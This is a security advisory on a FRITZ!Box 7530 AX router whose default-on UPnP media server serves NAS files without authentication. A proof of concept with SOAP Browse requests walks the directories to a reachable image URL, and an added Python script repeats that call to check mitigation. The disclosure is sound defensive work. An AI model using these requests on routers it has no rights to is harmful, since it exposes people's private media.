Advisory ID: SYSS-2021-050
Product: FRITZ!Box 7530 AX
Manufacturer: AVM Computersysteme Vertriebs GmbH
Affected Version(s): FRITZ!OS 7.27 and earlier
Tested Version(s): FRITZ!OS 7.27
Vulnerability Type: Missing Authorization (CWE-862)
Risk Level: Low
Solution Status: Open
Manufacturer Notification: 2021-08-02
Solution Date: 2021-08-02
Public Disclosure: 2022-02-15
CVE Reference: Not yet assigned
Authors of Advisory: Moritz Abrell, SySS GmbH

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

The FRITZ!Box 7530 AX [1] is a multifunctional home router including many
features like Wi-Fi 6, telephony services and others.

The router provides a network-attached storage (NAS), where authenticated
users can store e.g. photos, videos and music. Authentication is required
to access this data via the web application or via SMB. However, streaming
any media data (pictures, videos and music) via Universal Plug and Play
(UPnP) is possible without any authentication.

Due to this issue, unauthenticated attackers with access to the internal
network have read permissions on any media file stored on the NAS.

Since the UPnP standard [2] does not provide for authentication, this is
the expected behavior. However, the UPnP media server is enabled in the
default setting of the FRITZ!Box. Users could be misled by this and grant
access to otherwise protected data.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

To exploit this issue, an attacker with access to the internal network of
the FRITZ!Box 7530 AX, e.g. via Wi-Fi or LAN, can use UPnP with its
protocols and procedures to read media content stored on the NAS service
of the FRITZ!Box without authentication.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

1.
By sending the following HTTP POST request to the FRITZ!Box, information
about the NAS directories and their container IDs will be obtained:

Request:

POST /MediaServer/ContentDirectory/Control HTTP/1.1
Host: 192.168.178.1:49000
SOAPAction: "urn:schemas-upnp-org:service:ContentDirectory:1#Browse"
Content-Type: text/xml; charset="utf-8"
Content-Length: 321

<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/">
  <s:Body>
    <u:Browse xmlns:u="urn:schemas-upnp-org:service:ContentDirectory:1">
      <ObjectID>0</ObjectID>
      <BrowseFlag>BrowseDirectChildren</BrowseFlag>
    </u:Browse>
  </s:Body>
</s:Envelope>

Response (shortened):

<dc:title>Bilder</dc:title>
<upnp:class>object.container</upnp:class>

2. By sending the following HTTP POST request, including the container ID
of a specific directory, the FRITZ!Box responds with information about
subdirectories and their container IDs:

Request:

POST /MediaServer/ContentDirectory/Control HTTP/1.1
Host: 192.168.178.1:49000
SOAPAction: "urn:schemas-upnp-org:service:ContentDirectory:1#Browse"
Content-Type: text/xml; charset="utf-8"
Content-Length: 335

<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/">
  <s:Body>
    <u:Browse xmlns:u="urn:schemas-upnp-org:service:ContentDirectory:1">
      <ObjectID>4:cont1:90:0:0:</ObjectID>
      <BrowseFlag>BrowseDirectChildren</BrowseFlag>
    </u:Browse>
  </s:Body>
</s:Envelope>

Response (shortened):

<dc:title>Alle Bilder</dc:title>
<upnp:class>object.container</upnp:class>

3. This container ID can then be used to get information about media files
in this directory:

Request:

POST /MediaServer/ContentDirectory/Control HTTP/1.1
Host: 192.168.178.1:49000
SOAPAction: "urn:schemas-upnp-org:service:ContentDirectory:1#Browse"
Content-Type: text/xml; charset="utf-8"
Content-Length: 336

<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/">
  <s:Body>
    <u:Browse xmlns:u="urn:schemas-upnp-org:service:ContentDirectory:1">
      <ObjectID>4:cont2:100:0:0:</ObjectID>
      <BrowseFlag>BrowseDirectChildren</BrowseFlag>
    </u:Browse>
  </s:Body>
</s:Envelope>

Response (shortened):

<res>http://192.168.178.1:49200/IMAGE/DLNA-15-0/Bilder/TOP-SECRET.jpg</res>

4. Now, the TOP-SECRET.jpg picture is accessible at the URL
"http://192.168.178.1:49200/IMAGE/DLNA-15-0/Bilder/TOP-SECRET.jpg"
without authentication.

Alternatively, the open-source tool gupnp-av-cp [4] could be used, which
provides a graphical user interface and simplifies the exploitation of
this issue.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

SySS GmbH recommends disabling the media server function. For this, go to
"Home Network > Media Server > Settings" in the web interface of the
FRITZ!Box. Then uncheck the checkbox "Media Server enabled" and apply the
configuration.
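A post-mitigation check, added here as an example and not part of the SySS advisory or of AVM's firmware: it issues the same ContentDirectory Browse call the PoC uses and parses the DIDL-Lite answer, so an administrator can confirm that, once the media server is disabled, the endpoint no longer answers and nothing from the NAS is listed. The Filter/StartingIndex/RequestedCount/SortCriteria values, the function names and the sample response are assumptions.

```python
import urllib.error
import urllib.request
import xml.etree.ElementTree as ET
CD_NS = "urn:schemas-upnp-org:service:ContentDirectory:1"
DIDL_NS = "urn:schemas-upnp-org:metadata-1-0/DIDL-Lite/"
DC_NS = "http://purl.org/dc/elements/1.1/"

def browse_request(object_id: str) -> bytes:
    """SOAP body of the ContentDirectory Browse call from the advisory. The four
    arguments after BrowseFlag are assumed (no filter, no paging, no sort)."""
    return (
        '<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body>'
        f'<u:Browse xmlns:u="{CD_NS}"><ObjectID>{object_id}</ObjectID>'
        '<BrowseFlag>BrowseDirectChildren</BrowseFlag><Filter>*</Filter>'
        '<StartingIndex>0</StartingIndex><RequestedCount>0</RequestedCount>'
        '<SortCriteria></SortCriteria></u:Browse></s:Body></s:Envelope>'
    ).encode()

def parse_browse_response(body: bytes) -> dict:
    """Containers (id, title) and media <res> URLs of a Browse response. The DIDL-Lite
    document is XML-escaped inside <Result>; ElementTree unescapes it for us."""
    result = ET.fromstring(body).find(f".//{{{CD_NS}}}BrowseResponse/Result")
    if result is None or not result.text:
        return {"containers": [], "resources": []}
    didl = ET.fromstring(result.text)
    containers = [(c.get("id"), c.findtext(f"{{{DC_NS}}}title"))
                  for c in didl.findall(f"{{{DIDL_NS}}}container")]
    resources = [r.text for r in didl.iter(f"{{{DIDL_NS}}}res") if r.text]
    return {"containers": containers, "resources": resources}

def check_media_server(host: str, port: int = 49000, object_id: str = "0", timeout: float = 3.0):
    """None: the ContentDirectory endpoint is unreachable, i.e. the media server is off.
    Otherwise: the unauthenticated listing any device on the LAN would also receive."""
    req = urllib.request.Request(
        f"http://{host}:{port}/MediaServer/ContentDirectory/Control",
        data=browse_request(object_id), method="POST",
        headers={"Content-Type": 'text/xml; charset="utf-8"',
                 "SOAPAction": f'"{CD_NS}#Browse"'})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return parse_browse_response(resp.read())
    except (urllib.error.URLError, OSError, ET.ParseError):
        return None

# Constructed sample (not captured from a device), shaped like the advisory's shortened output.
SAMPLE_RESPONSE = b"""<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body>
<u:BrowseResponse xmlns:u="urn:schemas-upnp-org:service:ContentDirectory:1"><Result>
&lt;DIDL-Lite xmlns="urn:schemas-upnp-org:metadata-1-0/DIDL-Lite/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:upnp="urn:schemas-upnp-org:metadata-1-0/upnp/"&gt;
&lt;container id="4:cont1:90:0:0:" parentID="0"&gt;&lt;dc:title&gt;Bilder&lt;/dc:title&gt;&lt;upnp:class&gt;object.container&lt;/upnp:class&gt;&lt;/container&gt;
&lt;item id="ITEM-ID-PLACEHOLDER" parentID="4:cont2:100:0:0:"&gt;&lt;dc:title&gt;TOP-SECRET.jpg&lt;/dc:title&gt;&lt;res&gt;http://192.168.178.1:49200/IMAGE/DLNA-15-0/Bilder/TOP-SECRET.jpg&lt;/res&gt;&lt;/item&gt;
&lt;/DIDL-Lite&gt;</Result><NumberReturned>2</NumberReturned></u:BrowseResponse></s:Body></s:Envelope>"""
```

Running `check_media_server("192.168.178.1")` after applying the recommended setting should return None; a non-empty "resources" list means media on the NAS is still served without authentication.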
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2021-07-13: Vulnerability discovered
2021-08-02: Vulnerability reported to manufacturer
2021-08-04: The manufacturer indicates that this is the desired behavior
            and therefore no further measures are planned.
2022-02-15: Public disclosure

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Product Website
    https://en.avm.de/products/fritzbox/fritzbox-7530-ax/
[2] UPnP Standards
    https://openconnectivity.org/developer/specifications/upnp-resources/upnp/#standards
[3] SySS Responsible Disclosure Policy
    https://www.syss.de/en/news/responsible-disclosure-policy/
[4] GUPnP Tool Website
    https://wiki.gnome.org/Projects/GUPnP

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Moritz Abrell of SySS GmbH.

E-Mail: moritz.abrell@syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Moritz_Abrell.asc
Key Fingerprint: 2927 7EB6 1A20 0679 79E9 87E6 AE0C 9BF8 F134 8B53

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS website.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en